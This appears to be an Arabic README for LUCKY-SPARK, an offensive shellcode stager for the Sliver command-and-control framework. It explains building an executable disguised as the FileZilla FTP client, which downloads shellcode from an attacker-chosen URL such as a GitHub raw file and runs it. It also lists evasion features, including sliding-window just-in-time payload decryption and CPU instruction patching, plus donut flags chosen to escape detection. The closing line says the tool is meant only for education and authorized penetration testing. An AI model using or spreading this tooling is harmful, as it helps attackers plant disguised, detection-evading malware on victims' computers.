
أداة تحميل خفية مصممة لشحنات الشل كود المحملة عبر HTTP/HTTPS مثل Sliver، أو عبر raw على GitHub.
⟪ LUCKY-SPARK ⟫ هو أداة توجيه (stager) مصممة لـ shellcode payloads التي يتم توجيهها عبر http/https مثل sliver أو على github raw. يستخدم أساليب إخفاء وتجنب حديثة مثل التشفير في الوقت المناسب بنافذة منزلقة (sliding window just-in-time decryption) للحمولة وتصحيح تعليمات وحدة المعالجة المركزية. بشكل افتراضي، يقوم بإنشاء ملف تنفيذي يتنكر بهيئة عميل FileZilla FTP.
قم باستنساخ أو تنزيل المستودع وتأكد من تثبيت make و mingw على نظامك.
git clone <repository_url>
cd LUCKY-SPARK
قم بتنفيذ سكربت إنشاء البرنامج الثنائي.
./luckySpark.sh
سيُطلب منك إدخال عنوان URL لحمولتك الموجهة ووكيل مستخدم اختياري.

يمكن تنفيذه في سطر واحد ليتم تضمينه في السكربتات:
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

إذا كنت تستخدم donut أو Sliver (الذي يستخدم donut) فإنني أوصي بهذه العلامات لإنشاء الحمولة:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
هذا يتجنب السلوك المشبوه والمُعلّم بواسطة donut. خاصة أن تجنب donot نفسه مُعلّم بشكل كبير، ومن المفارقة.
ينشئ هذا ملفًا ثنائيًا filezilla.exe والذي عند تنفيذه يقوم باسترداد وتنفيذ الحمولة.
صُمم هذا الموجه (stager) للاستخدام مع Sliver. قم بتوجيه حمولة Sliver كما هو موضح هنا توجيه Sliver لا تقم بتشفير الحمولة.
لكن أي طريقة توجيه قائمة على http/https ستعمل.
مثل python3 -m http.server
أو حمولة مرفوعة على github.com في مستودع عام.
هذا الموجه لا يدعم بروتوكول توجيه meterpreter.
Step 1: RIP hits Page 0 and Page 0 gets decrypted
Pages: [ D | E | E | ... ]
RIP -> ^
Step 2: RIP hits Page 1 and Page 1 gets decrypted
Pages: [ D | D | E | ... ]
RIP -> ^
Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
Pages: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK مخصص فقط للأغراض التعليمية والبحثية واختبار الاختراق المصرح به. الاستخدام غير المصرح به ضد الأنظمة دون إذن هو غير قانوني وغير أخلاقي.